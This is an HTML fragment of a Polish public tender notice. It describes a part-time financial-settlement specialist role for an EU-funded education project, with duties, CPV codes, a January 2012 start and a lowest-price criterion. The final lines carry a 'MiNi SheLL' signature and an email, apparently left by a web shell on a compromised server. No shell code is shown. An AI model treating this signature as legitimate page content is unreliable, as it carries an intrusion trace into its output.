<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.22.40.00-1, 79.42.00.00-4, 79.42.10.00-1, 75.11.21.00-5, 79.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3 - świadczenie usługi Specjalisty ds. rozliczeniowo-finansowych projektu pn.: Uczyć się, aby być, wiedzieć, działać i żyć wspólnie w społeczeństwie, w ilości 80 godzin miesięcznie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres obowiązków:
1) terminowe i zgodne z budżetem projektu rozliczenie wydatków w ramach projektu oraz sporządzanie sprawozdań finansowych 
2) kontrola i przygotowanie opisu faktur w ramach projektu - prowadzenie dokumentacji finansowo-księgowej projektu zgodnie z aktualnymi wytycznymi POKL oraz obowiązującymi przepisami krajowymi i wspólnotowymi,
3) opracowywanie dokumentów, których sporządzenie wynika z umowy o dofinansowanie, między innymi: wniosków o płatność, formularzy PEFS, harmonogramów płatności i innych, np.: regularnych raportów o przebiegu procesu przygotowania i realizacji Projektu wraz z odpowiednimi załącznikami i pismami wyjaśniającymi, ewentualnych aneksów do umów podpisywanych w ramach projektu, a także innych dokumentów, których przygotowanie będzie wynikało z realizacji projektu lub o które poprosi Zamawiający lub Projektodawca,
4) przygotowanie w imieniu Zamawiającego postępowań o udzielenie zamówień publicznych związanych z realizacją projektu, zgodnie z jego budżetem na podstawie umowy o dofinansowanie projektu oraz na żądanie Zamawiającego wzięcie udziału w przeprowadzeniu postępowań o zamówienia publicznego,
5) niezwłoczne powiadamianie każdorazowo Zamawiającego o zagrożeniach i zmianach w realizacji projektu (każda zmiana musi zostać zaakceptowana przez Koordynatora Projektu, Zamawiającego, Beneficjenta Projektu oraz IP),
6) sporządzanie comiesięcznych protokołów z przeprowadzonych działań w ramach projektu i ich przekazywanie Zamawiającemu w terminie do 5 dni roboczych każdego następnego miesiąca dotyczącego okresu realizacji projektu,
7) współpraca ze wszystkimi osobami zaangażowanymi w realizację projektu w celu zapewnienia prawidłowego przepływu informacji w sprawach, za które odpowiedzialny jest Wykonawca..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.22.40.00-1, 79.42.00.00-4, 79.42.10.00-1, 75.11.21.00-5, 79.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com